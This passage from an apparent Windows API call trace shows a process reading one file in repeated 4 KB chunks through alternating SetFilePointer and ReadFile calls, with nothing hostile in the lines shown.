nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.397] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x8000 [0088.397] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.397] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x9000 [0088.398] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.399] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xa000 [0088.399] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.399] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xb000 [0088.399] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.400] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xc000 [0088.400] ReadFile (in: hFile=0x468, 
lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.400] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xd000 [0088.400] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.401] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xe000 [0088.401] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.401] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0xf000 [0088.401] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.402] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x10000 [0088.402] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.402] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x11000 [0088.402] 
ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.403] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x12000 [0088.403] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.404] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x13000 [0088.404] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.404] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x14000 [0088.404] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.405] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x15000 [0088.405] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.405] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) 
returned 0x16000 [0088.406] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.406] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x17000 [0088.406] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.406] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x18000 [0088.406] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.407] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x19000 [0088.407] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.408] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1a000 [0088.408] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.408] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1b000 [0088.408] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.409] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1c000 [0088.409] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.409] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1d000 [0088.409] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.410] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1e000 [0088.410] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.410] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x1f000 [0088.410] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.411] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x20000 [0088.411] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.411] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x21000 [0088.411] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.412] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x22000 [0088.412] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.413] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x23000 [0088.413] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.413] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x24000 [0088.413] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.414] SetFilePointer (in: 
hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x25000 [0088.414] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.414] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x26000 [0088.414] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.414] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x27000 [0088.414] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.415] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x28000 [0088.415] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.415] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x29000 [0088.415] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 
[0088.416] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2a000 [0088.417] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.417] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2b000 [0088.417] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.418] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2c000 [0088.418] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.418] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2d000 [0088.418] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.418] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2e000 [0088.419] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, 
lpOverlapped=0x0) returned 1 [0088.419] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x2f000 [0088.419] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.419] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x30000 [0088.419] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.421] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x31000 [0088.421] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.421] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x32000 [0088.421] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.422] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x33000 [0088.422] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, 
lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.422] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x34000 [0088.422] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.423] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x35000 [0088.423] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.423] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x36000 [0088.423] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.423] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x37000 [0088.424] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.424] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x38000 [0088.424] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | 
out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.425] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x39000 [0088.425] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.425] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3a000 [0088.425] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.426] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3b000 [0088.426] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.426] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3c000 [0088.426] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.427] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3d000 [0088.427] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.427] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3e000 [0088.427] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: lpBuffer=0x6c20084*, lpNumberOfBytesRead=0x4ebd8ec*=0x1000, lpOverlapped=0x0) returned 1 [0088.428] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd8c0*=0) returned 0x3f000 [0088.428] ReadFile (in: hFile=0x468, lpBuffer=0x6c20084, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8ec, lpOverlapped=0x0 | out: 